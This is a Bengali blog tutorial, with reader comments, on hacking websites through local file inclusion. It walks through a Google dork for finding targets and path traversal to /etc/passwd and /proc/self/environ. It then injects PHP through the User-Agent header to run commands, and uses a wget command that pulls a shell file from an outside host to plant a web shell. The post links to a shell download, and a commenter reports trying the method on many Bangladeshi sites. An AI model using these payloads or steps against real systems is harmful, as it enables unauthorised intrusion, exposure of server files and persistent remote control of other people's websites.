LFI হ্যাকিং টিউটোরিয়াল (LOCAL FILE INCLUSION)মেথড এ হ্যাক করুন ওয়েবসাইট।

সবাইকে স্বাগতম আমার টিউনে আজকে আমি আপনাদের কে সাথে নিয়ে 🙂 LFI মেথড এ ওয়েবসাইট হ্যাক করার চেষ্টা করব দেখি কি হয় ওয়েবসাইট হ্যাক হয় নাকি দেখি তাহলে ঃ) ।

প্রথমে গুগল ডর্ক দিয়ে গুগল থেকে ভুলনরাবল সাইট বের করতে হবে । LFI হ্যাকিং এর জন্যে আপনার ২টি মজিলা আডঅনস আডড করতে হবে একটি হল   Hackbat   অপর টি Temperdata হল এই নাম গুলো দিয়ে গুগল এ সার্চ করলে আপনি এই দুটো আডঅনস আপনার মজিলাতে ডাউনলোড করে  আডড করতে পারবেন তবে দুঃখের কথা হল আপদডেটেড মজিলা যারা ইউজ করেন তারা টেম্পার ডাটা টুলস টি কিভাবে ইউজ করবেন তা আবার জানা নেই 🙁 ।

এই গুগল ডর্ক টি দিয়ে গুগল এ সার্চ করুনঃinurl:index.php?&page=  এখন আমাদের চেক করতে হবে সাইট টি  LFI ভুলনরাবল কিনা চেক করার জন্যে সাইট প্রথমে গুগল এর রেসাল্ট থেকে একটি সাইট সিলেক্ত করুন সাইট টার লিঙ্ক হবে অনেক টা এরকম http://www.sitename.com/index.php?&page=apprentice এখন আপনাকে /index.php?&page= এর পূর্বে যে লেখা থাকবে সে লেখা টি বাদ দিয়ে এই এক্সপ্লইট টি আডড করুনঃ ../etc/passwd যদি নিচের স্ক্রিন শট টি মত দেখায় তাহলে বুঝতে হবে সাইট টি ভুলনরাবল হওয়ার সম্ভবনা রয়েছেঃ

তারপরে index.php?page=../../../../../etc/passwd  যোগ করুন যদি এরকম একটি স্ক্রিন আসে তাহলে বুঝবেন ঠিক জিনিসে পাইসেন এইডা কাম হয়বে হে হে ...

এখন ওয়েবসাইট লিঙ্ক এর শেষ এ এই এক্সপ্লইট টি যোগ করুনঃ index.php?page=../../../../../proc/self/environ

এখন আমারা একটি কমান্ড এক্সকিউট করার ট্রাই করব এবং আমাদের শেল টি ডাউনলোড করার চেষ্টা করব আমি একটা কথা বলে ভুলে গেছি দুঃখিত 🙁

আপনাকে প্রথমে একটি শেল ডাউনলোড করে সে শেল টি টেক্সট ফাইল হিসেবে যে কোনো হোস্টিং সাইট এ আপলোড দিয়ে দিন এখন থেকে মেডস্পট শেল ডাউনলোড করে নিতে পারেনঃ http://www.madspot.net/2013/01/madspot-shell-v2-released.html

এখন কাজ শুরু টেম্পার ডাটা নামক মজিলা আডডঅন্স এর নিচের স্ক্রিন শট টি লক্ষ করুনঃ

আডডঅন্স টি ওপেন হবে Start Temper নামক একটি অপশন দেখবেন ওটাতে ক্লিক করুন এরপর ওয়েবপেইজ় টি রিফ্রেস করুন তারপর এরক্ম একটি ইমেজ দেখতে পাবেন আপনি তারপর Temper এ ক্লিক করুনঃ

এরপরে এরকম একটি উইন্ডো ওপেন হবে স্ক্রিন শট টি লক্ষ করুন স্ক্রিন শট এ আমি একটি কমান্ড ইঊজ করেছি কমান্ড টি হচ্ছেঃ<? phpinfo() ?>

তাহলে দয়া করে স্ক্রিন শট টি লক্ষ করুন User Agent নামের পাশে একটি বক্স আছে যেটাতে মজিলা ফায়ার ফক্স এর ভারশন দেওয়া থাকবে ওই লেখাটি রিমুভ করে এই কোড টি পেস্ট করে ওকে করুন

এখন আপনার কাছে Temper With Request এর পারমিশন চাইবে আপনি Continue Temparing সিল্কেট করে Abort Request এ ক্লিক করতে থাকুন কয়েকবার এমন হওয়ার পর এরকম একটি স্ক্রিন আসবে এই স্ক্রিন এ ওয়েবসাইট এ ব্যাবহারিত পি এইচ পির কনফিগারেশন আসবে এগুলা চেক করেই আমরা বুঝতে পারব যে এই সাইট এ শেল এক্সকিউট করা যাবে নাকি করা যাবে নাহ । যদি কনফিগারেশন পেইজ় এ এই লেখা টি দেখায় HTTP_ACCEPT_LANGUGE  তাহলে শেল আপ্লোড করা যাবে ঃ)

এখন আমরা ওয়েবসাইট টি তে যে কোনো কিছু এক্সকিউট করতে পারব এখন আবার আমরা টেম্পার ডাটা ওপেন করব এবং  পেইজ় টি আবার রিফ্রেস করুন তারপর আপনার কাছে  Temper With Request পারমিশন চাইবে  Temper এ ক্লিক করুন এখন নিচের স্ক্রিন শট টির মত একটি উইন্ডো ওপেন হবেUser Agent এর পাশের লেখা গুলো রিমুভ করে

 <?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php এ

এই কোডটি পেস্ট করে টেম্পার এ ক্লিক করুন আবার আপনার কাছে পারমিশন চাইবে আপনি Abort Request এ ক্লিক করুন...এখন আমাদের চেক করতে হবে আমাদের কাঙ্কিত শেল টি আপ্লোড হয়েছে কিনা শেল টা যদি ঠিক ঠাক আপ্লোড হয় তাহলে শেল এর লিঙ্ক টি এরকম ঃ http://www.sitename/yourshell.php

ধন্যবাদ সবাইকে কষ্ট করে টিউন পডার জন্যে আমি নিজেও অনেক কষ্ট করে এই টিউন টি লেখেছি তাই ভাল ভাল কমেন্ট আশা করছি এর এই টিউন টির একটা জায়গায় আপনাদের একটু মথা খাটাতে হবে সেটা হল আমি শেষ যে পি এইচ পি কোড টি দিয়ছে তাতে যে শেল আপ্লোড হবে সেই শেল এর লিঙ্ক দিতে হবে আমি শুরুতেই বলেছি শেল টেক্সট ফরমেট  এ কোনো হস্টিং সাইট এ আপ্লোড দিয়ে রাখতে পারেন অথবা নিজের বুদ্ধি খাটিয়ে অন্য রাস্তা বের করে নিন ।

আশা করি টিউন টি আপনার কাছে সহজভাবে তুলে ধরতে পেরেছি তারপরও যদি কোনো সমস্যা হয় বিনা সংকোচে কমেন্ট করবেন ধন্যবাদ ।

Level 0

আমি farhan sadik। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 2 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 4 টি টিউন ও 15 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

ফারহান ভাই Here সবার কাছে এইডাই আশা রাখি যে আপনাদের কাছে কুপা শামসু টাইপের জ়োশ জ়োশ টিউন শেয়ার করতে পারুম ।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

কিছুই বুঝলাম না

না বুঝলে কিছু করার নেই -_- এক্টাই আইডিয়া ইউজ ব্রেইন 😀 ব্রেইন না থাকলে কাম হইব নাহ কারণ হ্যাকিং করার জন্যে সবচেয়ে জরুরি জিনিস ব্রেইন কম্পু ছাডা হ্যাক করা যায় কিন্তু ব্রেইন ছাডা কিসসু করা যায় নাহ 🙂

Level 0

valo but ei method ta khub kaj kore na, er thaka sql injection method ta hard holou valo kaj kore.
BD er onek gulo site a try koresi.

Level 2

ধন্যবাদ আপনাকে…….